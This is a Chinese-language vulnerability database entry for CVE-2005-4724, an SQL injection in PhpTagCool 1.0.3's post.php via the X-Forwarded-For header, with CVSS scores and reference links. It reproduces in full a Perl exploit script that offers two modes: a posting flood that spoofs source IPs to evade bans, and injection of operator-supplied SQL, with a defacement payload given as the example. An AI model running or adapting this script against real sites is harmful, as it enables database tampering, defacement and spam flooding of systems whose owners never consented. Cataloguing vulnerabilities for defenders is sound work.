CVE-2005-4724
CVSS7.5
发布时间 :2005-12-31 00:00:00
修订时间 :2008-09-05 16:57:38
NMCOE    

[原文]SQL injection vulnerability in post.php in PhpTagCool 1.0.3 allows remote attackers to execute arbitrary SQL commands via the X-Forwarded-For field in an HTTP header.


[CNNVD]PhpTagCool post.php SQL注入漏洞(CNNVD-200512-740)

        PhpTagCool 1.0.3的post.php存在SQL注入漏洞,远程攻击者可以通过HTTP标题中的X-Forwarded-For字段来执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4724
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4724
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-740
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/22228
(UNKNOWN)  XF  phptagcool-xforwardedfor-sql-injection(22228)
http://www.osvdb.org/19437
(UNKNOWN)  OSVDB  19437
http://securitytracker.com/alerts/2005/Sep/1014878.html
(UNKNOWN)  SECTRACK  1014878

- 漏洞信息

PhpTagCool post.php SQL注入漏洞
高危 SQL注入
2005-12-31 00:00:00 2006-03-01 00:00:00
远程  
        PhpTagCool 1.0.3的post.php存在SQL注入漏洞,远程攻击者可以通过HTTP标题中的X-Forwarded-For字段来执行任意SQL命令。

- 公告与补丁

        

- 漏洞信息 (1211)

PhpTagCool <= 1.0.3 SQL Injection Attacks Exploit (EDBID:1211)
php webapps
2005-09-11 Verified
0 Megabyte
N/A [点击下载]
#!/usr/bin/perl
##  PhpTagCool Zatueritor 1.0
##  Copyright: Megabyte www.mbytesecurity.org
##  Greetz: Rootbox for discovering the forwarded-for issue
##  Te amo Pandora
##  Crashcool,fuiste defaceado por un bug de tu propia programacion,ahora que inventaras?
 
use IO::Socket;
 
$x = 0;
 
print q(
PhpTagCool Zatueritor 1.0
by Megabyte
 
);
print q(Host |sin http://www.| );
$host = <STDIN>;
chop ($host);
 
print q(Ruta |ejemplo. /phptagcool/ o /| );
$pth = <STDIN>;
chop ($pth);
 
print q(Tipo de Atake |1 = Posteo Masivo, 2 = Injeccion SQL| );
$type = <STDIN>;
chop ($type);
 
## The Flood Attack
if($type == 1){
 
 
while($x != 255)
{
 
 
$nick = "nick=megabyte";
 
## We generate our own ip address so we won't be banned  :) 
$ip = "127.0.0" . "$x";
 
 
$postit = "$nick"."&url=http%3A%2F%2Fwww.mbytesecurity.org&mensaje=FloodingLam
eTag&Submit=Enviar";
 
 
$lrg = length $postit;
 
 
my $sock = new IO::Socket::INET (
                                 PeerAddr => "$host",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "\nNo se pudo conectar  :(  $!\n" unless $sock;
 
## We Fake the X-Forwarded-For header,so we can post with multiple ip's
print $sock "POST $pth"."mensajes.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwav
e-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox
/1.0.4\n";
print $sock "X-Forwarded-For: $ip\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
 
 
syswrite STDOUT, ".";
 
 
$x++;
}
 
## The SQL injection attack  :) 
}
elsif ($type == 2){
 
print q(Inyeccion a ejecutar Ejemplo 127.0.0.1'),('<h1>owned</h1>','http://mbytesecurity.
org','leim','hoy','11 );
$sql = <STDIN>;
chop ($sql);
 
 
 
my $sock = new IO::Socket::INET (
                                 PeerAddr => "$host",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "\nNo se pudo conectar  :(  $!\n" unless $sock;
 
 
print $sock "POST $pth"."mensajes.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q
=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox
/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "X-Forwarded-For: $sql\n";
close($sock);
 
}else{
 
	die "Solo hay 2 opciones IMBECIL\n";
}

# milw0rm.com [2005-09-11]
		

- 漏洞信息

19437
PhpTagCool post.php X-Forwarded-For Header SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

PHPTagCool contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the post.php script not properly sanitizing user-supplied input to the 'X-Forwarded-For' header. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2005-09-11 Unknow
2005-09-11 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站